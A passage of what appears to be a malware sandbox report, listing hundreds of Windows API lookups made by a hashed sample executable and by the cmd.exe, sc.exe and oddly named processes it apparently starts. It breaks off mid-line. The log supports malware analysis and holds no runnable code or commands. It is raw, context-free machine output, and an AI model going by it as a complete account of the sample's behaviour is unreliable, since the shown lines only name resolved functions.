\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002276)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003944)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004412)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004412)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003148)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003148)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004100)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004100)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004084)\n \"xagapalr.exe\" called 